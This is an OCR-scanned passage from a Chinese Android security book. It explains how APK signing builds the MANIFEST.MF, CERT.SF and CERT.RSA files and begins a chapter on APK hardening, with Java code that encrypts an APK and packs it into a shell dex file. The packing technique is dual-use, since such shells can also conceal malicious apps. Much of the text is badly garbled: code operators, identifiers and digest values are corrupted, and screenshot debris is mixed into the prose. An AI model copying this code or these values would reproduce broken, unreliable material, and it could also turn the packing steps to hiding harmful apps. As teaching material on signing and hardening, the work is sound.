/xx Add the SHA1 of every file to the manifest, creating it if necessary. */ 
private static Manifest addDigestsToManifest(JarFile jar) 
throws IOException, GeneralSecurityException { 


Manifest input - jar.getManifest(); 

Manifest output - new Manifest(); 

Attributes main - output.getMainAttributes(); 

if (input !- null) { 
main.putAll(input.getMainAttributes()); 

) else ( 
main.putValue("Manifest-Version", "1.0"); 

main.putValue("Created-By", "1.0 (Android SignApk)"); 


BASE64Encoder base64 = new BASE64Encoder(); 
MessageDigest md = MessageDigest.getInstance("SHAl"); 
byte[] buffer = new byte[40960]; 

int num; 


// We sort the input entries by name, and add them to the 
// output manifest in sorted order. We expect that the output 
// map will be deterministic. 


TreeMap«String, JarEntry» byName = new TreeMap«String, JarEntry»(); 


for (Enumeration«JarEntry» e = jar.entries(); e.hasMoreElements(); ) { 
JarEntry entry = e.nextElement(); 
byName.put(entry.getName(), entry); 


for (JarEntry entry: byName.values()) { 

String name - entry.getName(); 

if (!entry.isDirectory() && !name.equals(JarFile.MANIFEST NAME) && 
!Iname.equals(CERT SF NAME) && !name.equals(CERT RSA NAME) && 
(stripPattern == null || 
!IstripPattern.matcher(name).matches())) { 
InputStream data = jar.getlInputStream(entry); 
while ((num = data.read(buffer)) > 0) ( 

md.update(buffer, 0, num); 


Attributes attr - null; 

if (input !- null) attr = input.getAttributes (name); 

attr - attr !- null ? new Attributes(attr) : new Attributes(); 
attr.putValue("SHAl-Digest", base64.encode(md.digest())); 
output.getEntries().put(name, attr); 


return output; 


代码 逻辑 很 简单 ， 主 要 看 那个 循环 的 意思 : 除了 三 个 文件 (MANIFEST. MF, CERT.RSA, CERT.SF) 之 外 都 会 对 其 他 文件 
内 容 做 一 次 SHA1 算 法 ， 就 是 计算 出 文件 的 摘要 信息 ， 然 后 用 Base64 进 行 编码 即 可 ， 下 面 用 工具 来 做 个 案例 看 看 是 不 是 这 样 : B 


先 安装 工具 : HashTab， 这 个 工具 网 上 有 ， 可 以 自行 搜索 下 载 。 然 后 网 上 搜索 在 线 计 算 Base64。 


下 面 束 开始 验证 工作 吧 。 验 证 一 下 AndroidManifest.xml 文 件 ， 首 先 在 MANIFEST.MF 文 件 中 找到 这 个 条 目 ， 记 录 SHA1 的 
值 ， 如 下 所 示 : 


Name: AndroidManifest.xml 


SHAl-Digest: HatvxzxDVfVghUpzHved/XlaaJUnU- 


安装 HashTab 之 后 ， 找 到 AndroidManifest.xml 文 件 ， 右 击 ， 选 择 Hashtab， 如 图 12-7 所 示 。 


复制 SHA-1 的 值 : 9C64812DE7373B201C294101473636A3697FD73C， 到 上 面 的 那个 Base64 转 化 网 站 ， 转 化 一 下 ， 如 图 
12-8 所 示 。 


sgnApkDemo tmp k 


mE w 新 建文 件 去 
2 ER FEspir E RH zx 
Ы META-INF 2015/12/15 15:40 ”文件 去 
k res 2015/12/15 15:40 xf 
| AndroidManifest.xml 2015/12/15 15:34 XML X 
.. | AndroidManifest.xml ЕТЕ 
Hashl аһ Жї ES | 以 前 的 版 本 
ШЕЕ B 
/30543AL 
AADUST6AU0858C6FFDÜESRASBCAFESSFGL A 
96 64812DE/3/3B20102941014 /36364A363 /FD 7... 
lm 
МЇ: FAAARA E US Fa EE EDS RU) 
8 
А НК У... 
Hashl аһ v3.1.U ©2010 Implbits Software [http: //implbits. сог] 
HE: та pur phil] - http: zz" lip name 
一 | ER (А) 
ml 修改 日 有 L _ i ——— ik | 
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3C64812DE/3/3B2010294101473636A 369 /FD / 3C 


3C64812DE/3/3B2010294101473636A 369 /FD / 3C 


nGsBLec 3OyAcKUEBRzY 2o2l/1zw- 


图 12-8 SHA-1 值 转化 
nGSBLec3OyAcKUEBRzY2o2l/1zw=#IMANIFEST.M F 中 的 条 目 内 容 一 模 一 样 。 


那么 从 上 面 的 分 析 融 知道 了 ， 其 实 MANIFEST.MF 中 存储 的 是 这 样 的 内 容 : 逐一 所 历 里 面 所 有 条 目 ， 如 果 是 目录 残 跳 过 ， 如 
果 是 一 个 文件 ， 融 用 SHA1 (或 者 SHA256) 消息 摘要 算法 提取 出 该 文件 的 摘要 然后 进行 BASE64 编 码 后 ， 作 为 “SHA1- 
Digest” 属 性 的 值 写 入 到 MANIFEST.MF 文 件 中 的 一 个 块 中 。 该 块 还 有 一 个 “Name” 属 性 ， 其 值 束 是 该 文件 在 apk 包 中 的 路 


f, 
f£. 


2.CERT.SFX (4 


这 个 文件 主要 是 前 面 MANIFEST.MF 文 件 的 每 个 块 内 容 的 数据 摘要 信息 ， 如 下 所 示 : 


1 Signature-Version: 1.0 

2 SHA1-Digesc-Manifest: 2ZYkZndNu5S5HHHT7-«Byaflv3rS508- 
3 Created-By: 1.0 (Android) 

4 

5 Name: res/drawable-xhdpi-v4/ic launcher.png 
6  SHAl-Digest: qLB+xSuTsdodleS2aPJel/A5PvE= 

7 

B Name: AndroidManifest.xml 

9 SHAl-Digest: jinRzirOMDasPDq7kqoY2dfn-4cs- 
10 
11 Name: res/drawable/yw 1222 0335.jpg 
12  SHA1-Digest: OX1IFF7J3uwaxdcL-4FGtoFJCB8/Q4- 
13 
14 Name: res/drawable-hdpi-v4/ic launcher.png 
15  SHA1-Digest: nVLQ/wUjf9D4KSB217WqoHR14JY- 
16 


17 Name: res/layout/activity main.xml 
18 SHAl-Digest: X5DAubB-66D3-LDU4FlbiZLzhNg- 


20 Name: resources.arsc 
21  SHA1-Digest: WFG/buw-bYuO1EmjwStvqE4sxIs- 


23 Name: res/drawable-mdpi-v4/ic launcher.png 
24  SHAl-Digest: NBFXylmaYHW4TAiVCw6R9-«EBNqI- 


26 Name: res/drawable/ic launcher.png 
27 SHAl-Digest: d5S5Sa9V£f£GK7T73AAZ3DTEnCO851u55c= 
29 Name: classes.dex 


30  SHAl-Digest: n6S5YoJhCNI1IG-Lf8u8f694-KP6go- 


32 Name: lib/armeabi/libsgmain.so 
33  SHA1-Digest: /GbkENNi2WDCorqgiqovSSwlxRE- 


35 Name: res/drawable-xxhdpi-v4/ic launcher.png 
36  SHAl-Digest: W7nSszMeLlxOeIt3K2CoCIHU6Qqg- 


这 里 的 内 容 感觉 和 MANIFEST.MF 的 内 容 差 不 多 ， 来 看 看 代码 吧 : 


/ Г CERT.SF 

Signature signature = Signature.getInstance("SHAlwithRSA"); 
signature.initSign(privateKey); 

je = new JarEntry (CERT SF. NAME); 

je.setTime(timestamp); 

outputJar.putNextEntry(je); 

writeSignatureFile(manifest,new SignatureOutputStream(outputJar, signature)); 


进入 到 writeSignatureFile 方 法 中 : 


/** Write a .SF file with a digest the specified manifest. */ 
private static void writeSignatureFile(Manifest manifest, OutputStream out) 
throws IOException, GeneralSecurityException { 


Manifest sf - new Manifest(); 

Attributes main = sf.getMainAttributes(); 
main.putValue("Signature-Version", "1.0"); 
main.putValue("Created-By", "1.0 (Android SignApk)"); 


BASE64Encoder base64 = new BASE64Encoder(); 
MessageDigest md = MessageDigest.getlinstance("SHA1"); 
PrintStream print - new PrintStream( 
new DigestOutputStream(new ByteArrayOutputStream(), md), 
true, "UTF-8"); 


// Digest of the entire manifest 

manifest.write(print); 

print.flush(); 

main.putValue("SHAl-Digest-Manifest", base64.encode(md.digest())); 


Map«String, Attributes» entries = manifest.getEntries(); 


for (Map.Entry«String, Attributes» entry : entries.entrySet()) { 
// Digest of the manifest stanza for this entry. 
print.print("Name: " + entry.getKey() + "\г\п"); 
for (Map.Entry«Object, Object» att : entry.getValue().entrySet()) ( 
print.print(att.getKey() + ": " + att.getValue() + "\г\п"); 


} 

Drlinb.pbeéinci"'Xrint): 

prinb rlusHils 

Attributes sfAttr - new Attributes(); 


sfAttr.putValue("SHAl-Digest", base64.encode(md.digest())); 
sf.getEntries().put(entry.getKey(), sfAttr); 


sf.write(out); 


首先 可 以 看 到 ， 需 要 对 之 前 的 MANIFEST.MF 文 件 整个 内 容 做 一 个 SHA1 放 到 SHA1-Digest-Manifest 字 段 中 。 
看 看 manifest 变 量 就 是 刚刚 写 入 了 MANIFEST.MF 文 件 的 ， 这 个 可 以 验证 一 下 ， 如 图 12-9 所 示 。 


然后 转化 一 下 ， 如 图 12-10 所 示 。 


| |. | MANIFEST.MF 2015/12/15 15:34 МЕ 
“| MANIFEST.MF Ætt — à om 


nd 以 前 的 版 本 


MAE 

F23151CD 
(028A26BD5E016DF74726DF8EEB24A98C 
DDB9B70BA96329FFCC67AD3862AEA4EQ121EE... 


ЈА 
МЕИ: FAHA AARAA) 


AHE EHF... 


HashT ab 5.1.0 22010 Implbits Software [http: Aimplbits. corn] 
E: EE El [ipu phil] - http: гри. name 


9129 ”查看 文件 的 SHA-1 值 


DDBSB/0BAS63289FFCCO6/AD3362AEAE0121EEC 215 


DDB3SB7/0BAS6329FFCC67AD3862AFAED121EEC215 


Jbm3Cb6lJKf/MzZb504 Y qBOASHuwhU- 


12-10 ”SHA-1 值 转化 成 Base64 


看 到 了 吧 ， 和 文件 中 的 值 是 一 样 的 ， 如 下 所 示 : 


Signature-Version: 1.0 
SHA1-Digest-Manifest: 2ZYkZndNu5SHHH7-«Byaflv3rSo8- 


Created-By: 1.0 (Android) 


下 面 继续 看 代码 ， 有 一 个 循环 : 


Map«String, Attributes» entries = manifest.getEntries(); 
for (Map.Entry«String, Attributes» entry : entries.entrySet()) { 
// Digest of the manifest stanza for this entry. 
print.print("Name: " + entry.getKey() + "WArMn"); 
for (Map.Entry«Object, Object» att : entry.getValue().entrySet()) { 
print.print(att.getKey() + ": " + att.getValue() + "WMrMn"); 
} 
站 
print.flush(); 


Attributes sfAttr - new Attributes(); 
sfAttr.putValue("SHAl-Digest", base64.encode(md.digest())); 
sf.getEntries().put(entry.getKey(), sfAttr); 


sf.write(out); 


jx ERR Ва T КИКИ NBSmainfestze£, dep cBJBPE, fAexSSHAgBOAZYTg&, 再 用 Base64 计 算 一 下 。 其 实 就 是 
对 MANIFEST.MF 文 件 中 的 每 个 条 目 内 容 做 一 次 SHA， 骨 保存 一 下 即 可 。 


Ë] | 
2 
° 


做 个 例子 验证 一 下 : 用 AndroidManifest.xm| 为 例 ， 把 MANIFEST.MF 文 件 中 的 条 目 拷 贝 保存 到 txt 文 档 中 ， 如 图 12-11 所 


| 文件 (F) ”编辑 (E) 格式 (0) 查看 (V) 帮助 (H) 


| 


I Name: åndroidManifest. xml 


|SHA1-Digest: nGSBLec30yAcKUEBRzY2o21/1zw= 


图 12-11 签名 文件 格式 


这 里 需要 注意 的 是 ， 保 仓 忆 后， 需要 添加 两 个 换行 ， 可 以 在 代码 中 看 到 逻辑 如 下 所 示 : 


// Digest of the manifest stanza for this entry. 

print.print("Name: " + entry.getKey() + "\г\п"); 

for. (Map.Entry«Object, Object» att : entry.getValue().entrySet()) í 
print.print(att.getKey() + ": " + att.getValue() + "\г\п"); 


print.print("\r\n"); 


print.flush(); 


然后 计算 txt 文 档 的 SHA 值 ， 如 图 12-12 和 图 12-13 所 示 。 


-— | 
sli = 


以 前 的 版 本 


BA085F58 
955CB5A49FF3D6B3993023FCDBE17DCD 
8E53078887801F814D46A6EB1C3F546F437FEF7F 


І 
FERE: ТУАЛЕТЕ УЕ АА) 
8E530788B7801F814D46AGEB1C3F546F437FEF7F 


SHA-1 ЖЕЕ ERE P+... 


HashT ab v5.1.0 ©2010 Implbits Software [http: z ?irplbits.com] 
HE: ERR Бри phil] - http: гри. name 


C ERG) | 


图 12-12 ”查看 文件 签名 


8E530788B7801F814D465A6EB1C3F546F437FEF7F 


8E530788B7801F814D46AS6EB1C3F546F437FEF7F 


JINMHiLeAH4FNRqbrHDSUDbDN/738= 


图 12-13 Base64 转 码 
看 到 了 吧 ， 这 里 计算 的 值 是 一 样 的 ， 如 下 所 示 : 


Name: AndroidManifest .xml 


m! E p Гү — | ќар 
И j | I ' ч" | EI ET „F | | . " m y Ex = dm 
Era i EFi LIC p Le n we! BRE B E WX PIU"LE FR ri ШШ! 
к= = — Praa ean = Г < = Д. а. Ku ә. QL. w r | 


到 这 里 就 知道 CERT.SF 文 件 做 了 什么 ， 如 下 所 示 : 


1) 计算 MANIFEST.MF 文 件 的 整体 SHA1 值 ， 再 经 过 BASE64 编 码 后 ， 记 录 人 在 CERT.SF 主 属性 块 (在 文件 头 上 ) 的 “SHA1- 
Digest-Manifest" 属性 值 值 下 。 


2) 逐条 计算 MANIFEST.MF 文 件 中 每 一 个 块 的 SHA1， 并 经 过 BASE64 编 码 后 ， 记 录 在 CERT.SF 中 的 同名 块 中 ， 属 性 的 名 字 
是 “SHA1-Digest” 。 


3.CERT.RSAYX (A4 


这 个 文件 束 是 对 前 面 CERT.SF 文 件 做 签名 操作 之 后 的 结果 ， 也 丈 是 前 面 提 人 到 的 签名 文件 ， 如 下 所 示 : 


82981 
38d2 
2971 
6685 
98c1 
5238 
2eaa 


看 到 都 是 二 进 制 文 件 ， 因 为 RSA 文 件 加 密 了 ， 所 以 需要 用 openssl 命 令 才 能 查看 其 内 容 ， 如 下 所 示 : 


openssl pkcs7 -inform DER -in CERT.RSA -noout -print certs -text 


O4af 
адзе 
0302 
0/01 
0201 
86f7 
5504 
1307 
0403 
6730 
385a 
5a30 
3118 
6964 
726f 
0609 
өтөө 
9+2а 
c19f 
88fc 
6364 
6#75 
1788 


0609 
8204 
1a65 
a082 
0202 
0901 
0613 
416e 
130d 
1e17 
178d 
3731 
300e 
3116 
6964 
2a86 
3082 
9419 
2807 
bad8 
b4bd 
cfa7 
2d26 


2а86 
9c02 
0030 
0311 
845c 
010b 
0255 
6472 
416e 
0d31 
3434 
Əb30 
0603 
3014 
2044 
4886 
010a 
с565 
f9ad 
Odab 
5476 
7891 
f13d 


4886 
0101 
8b86 
3082 
с987 
05008 
5331 
6f69 
6472 
3431 
3132 
0906 
5504 
0603 
6562 
f70d 
0282 
d56a 
ccbf 
9b29 
14b5 
bo9f 
807a 


f70d 
310b 
092a 
030d 
8630 
3037 
1030 
6431 
6f69 
3232 
3134 
0355 
0a13 
5504 
7567 
0101 
0101 
efb2 
4e93 
е46с 
7bc1 
5cfe 
193a 


0107 
3009 
6648 
3082 
ed6e6 
310b 
0eo06 
16308 
6420 
3230 
3034 
0406 
0741 
0313 
3082 
0105 
00aA 
45сЬ 
1144 
cdAc 
9f28 
854+ 
2e76 


02a0 
0605 
86f7 
01f5 
092a 
3009 
0355 
1406 
4465 
3431 
3132 
1302 
6e64 
0dA1 
0122 
0003 
580dA 
db76 
8b78 
5a33 
02ab 
85af 
3206 


i8i-PC /cygdrive/d 
5 openssl pkcs? -in CERT.RSñ -inform DER -print certs -text 
Certificate: 
Data: 
Version: 3 «8x25 
Serial Number: 1556711382 4x5cc98786» 
Signature filgorithm: sha256UithRSfüiEncryption 
Issuer: C-US, O-findroid, CN-findroid Debug 
Validity 
Not Before: Dec 22 04:12:48 2014 GMT 
Not After : Dec 14 04:12:48 2044 GMT 
Subject: C-US, O-findroid, CN-findroid Debug 
Subject Public Key Info: 
Public Key Algorithm: rsaEncryption 

Public-Key: (2048 bit» 

Modulus: 
B0:a4:50:d44:38:d2:9f:2a:94:19:c5:65:d5:6a:ef: 
b2:45:cb:db:76:29:71:c1:0Uf :28:07:f9:ad:cc:bf: 
4e :93:d1:4d4:85b:78:66:85:88:£c:ba:d8:8d:ab:9b: 
29:e4:6c:cd:4c:5a:33:98:c1:63:64:hb4:bd:54:76: 
14:h5:7b:c1:9f :28:02:ab:52:38:6f :75:c£f :a7:78: 
91:58:9f :5c:fe:85:4f :85:af :2e:aa:d7:88:24d4:26: 
f1:34:88:7a:18:3a:2e:76:32:806:bf :34:eb:11:96: 
ec:e3:89:9a:dd:d3:6f :a9:66:£f£:04:a2:37:2e:6a: 
08:94:17:64:96 :9а:88:34:33:87:Ға:55 :Ь8:с7:01 : 
46:95:d5:1a:980:2c:b7:a9:03:7£ :c2:ec:13:dd:57: 
98:93:7b:a1:70:52:74d:1d:d9:80:5d :b4:41: bd: a8: 
d5:08:6d:b9:801:fd:0f :£9:09:49:63:05:99:78:3e: 
99:21:d9:b4:51:9f :96:fc:dc:e6:11:43:47:c4:1e: 
cd:75:£b:24:c9:3b:b1:38:c1:£2:64d:2e:e6:d8:9d: 
63:6c:1b:b4:14:cd:21:058:8a:b7:"7£f :Ь2 :93:3е:68 : 
7b:85:9b:ad:4f : f8:ec:c2:c2:1e:5e:a9:41:16:9d: 
4f :47:4d9:2a:27:a7:69:56:86:d80:cc:5f£ :5c:6f :1e: 
75:63 

Exponent: 65537 <0х10001 > 

8580903 extensions: 
458903 Subject Key Identifier: 
6D:3B:85:DB:B5:808:22:CD:B6:81:48:04:12:C8:BB:92:3E:92:E9:f1 
Signature Algorithm: sha256UithRSfiEncryption 

62:d1:1f:d8:fe:61:be:4e:e7:08:c8:e7:4e:fc:88:88:8a:b8: 
6b:48:3e:680:01:1e:82:79:96:59:3c:33:48:73:b1:2e:a7:82: 
db:88:89:5f£ :18:9a:09:b7:4e:c9:9£ :3c:73:97:c1:39:c6:e8: 
69:c6:f1:68:38:3f :19:4b:b6:d3:e8:8f :6b:eb:93:73:c2:f2: 
6b:46:9e:26:35:059:d6:c8:a8:1c:75:85:59:25:4d9:a5:ac:a4: 
aB:88:58:dc:4c:51:f1:58:99:24:9e:6£ : f6:aB8:cc: 03:89 :се : 
35:da:34:52:da:78:a8:86:2a:8£f :3£ :c6:9c:55:05:6f : 43:20: 
bi :,6а:64:14:5Ь:45 :Ь2 :аа:е1:с5 :'78 : 00:55 :80:85 :е7?:Ь1 :28 : 
9e:f7:92:8d:86:82:ad:df :35:59:98:34:a1:7£ :e4:d1:4d:dc: 
9d:91:32:£2:37:94:f0:36:7c:bU:e3:de:ae:Uf : be:19:4b:09"7: 
4c :26:58:29:15:be:f0:74:47:61:8a:c2:2£ :65:52:17:08:d9: 
94:7e:ba:64:bc:hb5:97:£d:08:73:ed:5d : Bf :a7:£ b:fB:ab:6a: 
4c :88:87:bb:46:98:b1:df :a6:79:d1:ab:57:58:9d:)507:88:e8: 
d6:6e:ff :5a:56:68:59:dd:8e:9a:e5:ed:94:94d0:58:2c:8d :e"7: 
07:98 :8d:e3 


тыша MINIME аа EATA ON ERAEN 


天 于 这 些 信息 ， 可 以 参考 图 12-14 的 解释 。 


来 看 一 下 代码 : 


/** Write a .RSA file with a digital signature. */ 
private static void writeSignatureBlock ( 
Signature signature, X509Certificate publicKey, OutputStream out) 
throws IOException, GeneralSecurityException { 
SignerlInfo signerInfo = new SignerInfo( 
new X500Name (publicKey.getIlIssuerXb500Principal().getName()), 
publicKey.getSerialNumber(), 
AlgorithmId.get("SHAl1"), 
AlgorithmId.get("RSA"), 
signature.sign()); 


PKCS7 pkcs7 = new PKCS7( 
new Algorithmid[] { AlgorithmId.get("SHA1") ), 
new ContentInfo(ContentlInfo.DATA OID, null), 


new X509Certificate[] í publicKey }, 
new SignerInfo[] í signerInfo }); 


pkcs7.encodeSignedData (out); 


AR: 由 内 容 二 解析 得 到 


Data; 
Маты: 3 (Шә =“ = = =  — | 
Serial Humber: 1265822703 (Üx4bB22e2f]) — — — — — = = = = а | 
Signature Algorithn: shalHirhRSAEncryptión-- —-—-—-—-—-—-—- == | o 
Iasuer: С=СЕ, SI=Peking, L-Peking, O=BYI, OU-RYT, CH=BYI + 
Validity 
Нос Before: Feb 22 07:11:43 2010 GMI __________ 
Нов After : Jul 10 07:11:43 2037 GHT 
Subject: CwCH, SIxPeking, LePering, OwRYI, OURYT, CHsRYT 
Subject Public Key Info: eM 
Public Wey Algorithm: rsaÉncryption 
Public-Hey: (1024 bit) 
Hedulus: 


X. 509 格 式 证 书 


. 
тш ШШ a sisi п ee 


#D:50:;b2;:3d:;i65:6e3:53:36;:3b:D1:86; 598: Fa: 53: ëB: | 
IT:iBH:32:04:fd:BTidT:5a:BO:Bliecich:fgb: 41:189: 
d4:Ba:49:90:53:35:0f:8b: 40:63:53: b4:dd:d1: 6b: | 
&a5:77:0£:5a:05:33:8d:c7:d4d:e7:2a:£0:35:11:hc: | 
„ЕЕ НИНЕН {НҢ Ҥ.ЕН =, Ë 
Exponent: 65537 (O0z10001] 
fignature Algorithm: shaiWithRSAEncrypticn 
60:64:98:d9:3b:ca:a4:ea:£5:88:04:42:ee:dT:48:46:b3: cd: 


1 
Б И Д Ll ТА Ti а А Н Е Л LL. LL a Ll = 


d5:Eb;:7T4;: 20; ЕТЕ А5: Веза: 6ТЕ 14:12: ВФ: 23:0: 2: А023: 
СЕҢ ЕН ЕНТ БТ: 1С: ДЕЕ ЕЕ ЕУ Ет: тва ЫЕ К АЖЕ ЖН 
Tš 36:45; ТП: Tt 8&; ТТ Leiti TTi efr ай: EEr bA Adi Eli fai 


3tarti1082)]2285030820129280030201 0202044b&22e 3 4E300d3060528a8EE4EBEETDd0101050 5003058 n 
310b3009060355040613024348310f300400603550408130650656hb696667310f 3004060355040 D 


0£30040603550407130650656b6266673106300a06035504021313525054310:300a060355042 D 
ME EE E “ ARZ: X. 509 3E 45 46 X, 


7Tb736458707b56771660 T Tef Ma ESGhbER ФЕТ агат 


“内 容 二 : СЕКТ. RSA 文 件 中 的 二 进 制 内 容 


图 12-14 ”rsa 文件 格式 说 明 


这 里 会 把 之 前 生成 的 CERT.SF 文 件 用 私 钥 计 算出 签名 ， 然 后 将 签名 以 及 包含 公 钥 信息 的 数字 证 书 一 同 写 入 CERT.RSA 保 存 。 


CERT.RSA 是 一 个 满足 PKCS7 格 式 的 文件 。 


12.3 Android 中 为 何 采 用 这 种 签名 机 制 


本 节 忆 结 一 下 Android 中 为 何 要 用 这 种 方式 进行 加 密 签 名 ， 如 果 apk 文 件 被 自 改 后 会 友 生 什 么 。 


首先 ， 如 果 改 变 了 apk 包 中 的 任何 文件 ， 那 么 在 apk 安 装 校 验 时 ， 改 变 后 的 文件 摘要 信息 与 MANIFEST.MF 的 检验 信息 不 
同 ， 于 是 验证 失败 ， 程 序 就 不 能 成 功 安装 。 其 次 ， 如 果 对 更 改过 的 文件 算出 新 的 摘要 值 ， 然 后 更 改 MANIFEST.MF 文 件 里 面 对 应 
的 属性 值 ， 那 么 必定 与 CERT.SF 文 件 中 算出 的 摘要 值 不 一 样 ， 照 样 验证 失败 。 最 后 ， 如 果 你 还 不 死心 ， 继 续 计 算 MANIFEST.MF 
的 摘要 值 ， 相 应 地 更 改 CERT.SF 里 面 的 值 ， 那 么 数字 签名 值 必定 与 CERT.RSA 文 件 中 记录 的 不 一 样 ， 还 是 失败 。 


那么 能 不 能 继续 伪造 数字 签名 呢 ? 不 可 能 ， 因 为 没有 数字 证 书 对 应 的 私 钥 。 所 以 ， 如 果 要 重新 打包 后 的 应 用 程序 能 在 
Android 设 备 上 安装 ， 必 须 对 其 进行 重 签名 。 


从 上 面 的 分 析 可 以 得 出 ， 只 要 修改 了 apk 中 的 任何 内 容 ， 融 必须 重新 党 名 ， 不 然 会 提示 安 委 失败 。 


在 分 析 了 签名 近 术 之 后 ， 无 意 中 友 现 一 个 问题 ， 融 是 CERT.SF 和 MANIFEST.MF 这 两 个 文件 中 内 容 的 name 字 段 都 是 apk 中 
的 资源 名 ， 那 么 融 有 一 个 问题 了 ， 如 果 资 源 名 很 长 ， 而 且 apk 中 的 资源 很 多 ， 那 么 这 两 个 文件 融会 很 大 ， 这 里 是 不 是 可 以 优化 
е? 确实 是 可 以 的 。 这 里 不 多 详细 解析 ， 感 兴趣 的 同学 可 以 去 看 一 下 开源 框 染 AndResGuard。 


第 13 音 Android 应 用 加 固原 理 


本 章 介 绍 Android 中 对 apk 进 行 加 固 的 原理 。 现 阶段 Android 中 的 反 编 译 工 作 越 来 越 容易 操作 ， 开 发 者 辛苦 地 开发 出 一 个 apk， 
结果 被 人 反 编 译 了 ， 那 心情 真心 不 舒服 。 虽 然 加 入 混 消 ， 做 到 hative 层 ， 但 是 这 都 是 治标 不 治本 的 办 法 。 反 编译 的 技术 在 更 新 ， 
那么 保护 apK 的 技术 就 不 能 停止 。 现 在 网 上 有 很 多 abpk 加 固 的 第 三 方 平 台 ， 例 如 爱 加 窗 和 构 构 等 。 有 些 人 认为 加 固 技 术 很 高 深 ， 其 
实 不 然 ， 加 固 技 术 就 是 对 源 apk 进 行 加 客 ， 然 后 再 套 上 一 层 壳 即 可 。 当 然 还 有 一 些 细节 需要 处 理 ， 这 就 是 本 章 需 要 介绍 的 内 容 。 


13.2 ”案例 分 析 
根据 上 节 分 析 得 知 ， 加 固 后 新 的 dex 文 件 中 有 三 个 项 目 ， 本 节 来 依次 看 一 下 这 三 个 项 目的 代码 实现 。 


.需要 加 密 的 源 程 序 apk 项 目 : ForceApkObj 


需要 一 个 Application 类 ， 如 图 13-4 所 示 。 


а WÈ ForceApkOb, 
4 E src 
а Hj com.example.ftorceapkob| 
> |J] MainActivity.Java 
> |J] MyApplication.java 
> |J] SubActivity.Java 


u 
N 


图 13-4 ”加 国 abk 项 目 结构 图 
下 面 来 分 析 一 下 MyApplication 源 码 : 


package com.example.forceapkobj; 
import android.app.Application; 
import android.util.Log; 
public class MyApplication extends Application(í 
aOverride 
public void onCreate() { 
super.onCreate(); 
Log.i("demo", "source арк onCreate:"-«this); 


| 


就 是 打印 一 下 onCreate 方 法 。 继 续 来 分 析 一 下 MainActivity 源 码 : 


package com.example.forceapkobj; 


import android.app.Activity; 

import android.content.Intent; 

import android.os.Bundle; 

import android.util.Log; 

import android.view.View; 

import android.view.View.OnClickListener; 
import android.widget.TextView; 


public class MainActivity extends Activity ( 


@Оуеггі ае 
protected void опСгеаѓе (Bundle savedlInstanceState) { 
super.onCreate(savedInstanceState); 


TextView content - new TextView(this); 
content.setText("I am Source Apk"); 
content.setOnClickListener(new OnClickListener()( 
@Оуеггіае 
public void onClick(View arg0) í 
Intent intent = new Intent(MainActivity.this, SubActivity.class); 
startActivity (intent); 


12); 


setContentView(content); 


Log.i("demo", "app:"-«getApplicationContext()); 


也 是 简单 地 打印 一 下 内 容 。 


2. 加 过 程序 项 目 : DexShellTools 


加 壳 程 序 其 实 束 是 一 个 Java 项 目 ， 它 的 工作 残 是 加 密 源 apk， 然 后 将 其 写 入 脱 壳 dex 文 件 中 ， 修 改 文件 涉 ， 得 到 一 个 新 的 
dex 文 件 即 可 ， 如 图 13-5 所 示 。 


t2» DexShellTools 
4 58 src 
4 HH com.example.reforceapk 
> |J] mymainJjava 


b mà JRE System Library [JavoSE 1.7] 


4 © force 210762 А ТАУ dex 文件 
Р; dasses dd” — | 
Ñ, ForceApkObj.apk Gw 源 程序 apk 
B ForceApkObj.dex< 人 em 一 一 脱 直 程序 的 dex 文件 


图 13-5 Jo% H 


下 面 来 分 析 一 下 具体 代码 : 


package 


import 
import 
import 
import 
import 
import 
import 
import 


CO 


Java. 
Java. 
Jawa, 
java. 
java. 
java. 
java. 
java. 


example.reforceapk; 


io 


10. 
pos 
EUN 
Do 


.ByteArrayOutputStream; 


File; 
FilelnputStream; 
FileOutputStream; 
IOException; 


security.MessageDigest; 
security.NoSuchAlgorithmException; 
util.zuip.Adler32;:; 


public class mymain { 


/** 


х (àparam args 


=y 


public static void main(String[] args) { 
// TODO Auto-generated method stub 


CEY 


int unShellDexLen = unShellDexArray.length; 


{ 


File payloadSrcFile = new File("force/ForceApkObj.apk"); 


[4 


需要 加 这 的 程序 


System.out.println("apk size:"+payloadSrcFile.length()):; 
File unShellDexFile = new File("force/ForceApkObj.dex"); 
/ / #5 dex 
// 以 二 进 制 形式 读 出 apk， 并 进行 加 密 处 理 // 对 源 Арк 进行 加 密 操作 


byte[] 


// 以 二 进 制 形式 读 出 dex 
byte[] unShellDexArray = 
int payloadLen - payloadArray.length; 


payloadArray - encrpt(readFileBytes(payloadSrcFile)); 


readFileBytes (unShellDexFile); 


int totalLen = payloadLen + unShellDexLen +4;// 多 出 4 字 节 是 存放 长 度 的 
byte[] 
/ / 添加 解 达 代码 
// 先 拷贝 dex WX 
System.arraycopy (unShellDexArray, 0, 
/ / 添加 加 密 后 的 解 充 数 据 ， 添 加 解 充 数 据 长 度 
System.arraycopy (payloadArray, 0, 
// 最 后 4 为 长 度 
System.arraycopy(intToByte(payloadLen), 0, 


newdex = new byte[totalLen]; 


newdex, 


// 申请 了 新 的 长 度 


newdex, 0, unShellDexLen); 


unShellDexLen, payloadLen); 


newdex, 


totalLen-4,4); 


// 修改 DEX file size 文件 头 
fixFileSizeHeader (newdex); 
// 修改 DEX SHA1 文件 头 
fixSHAlHeader (newdex); 

// 修改 DEX CheckSum x fF Ж 
fixCheckSumHeader (newdex) ; 


String str = "force/classes.dex"; 

Flle file = new File(str); 

if (!file.exists()) { 
file.createNewFile(); 


FileOutputStream localFileOutputStream - new FileOutputStream(str); 
localFileOutputStream.write(newdex); 

localFileOutputStream.flush(); 

localFileOutputStream.close(); 


} catch (Exception e) { 
e.printStackTrace(); 


下 面 来 详细 分 析 一 下 具体 代码 逻辑 : 


// TODO Auto-generated method stub 


try ( 

File payloadSrcFile = new File("force/ForceApkObj.apk"); // 需要 加 充 的 程序 
System.out.println("apk size:"+payloadSrcFile.length()); 

File unShellDexFile = new File("force/ForceApkObj.dex"); // Ё dex 


byte[] payloadArray = encrpt(readFileBytes (payloadSrcFile));// M — 3t tl P A iz Н 
apk， 并 进行 加 密 处 理 // 对 源 Арк 进行 加 密 操 作 

byte[] unShellDexArray = readFileBytes(unShellDexFile);// 以 二 进 制 形式 读 出 dex 

int payloadLen = payloadArray.length; 

int unShellDexLen - unShellDexArray.length; 

int totalLen = payloadLen + unShellDexLen +4;// 多 出 4 字 节 是 存放 长 度 的 

byte[] newdex = new byte[totalLen]; // 申请 了 新 的 长 度 

// 添加 解 达 代码 

System.arraycopy(unShellDexArray, 0, newdex, 0, unShellDexLen);// +# Jl dex WA 

/ / 添加 加 密 后 的 解 克 数据 

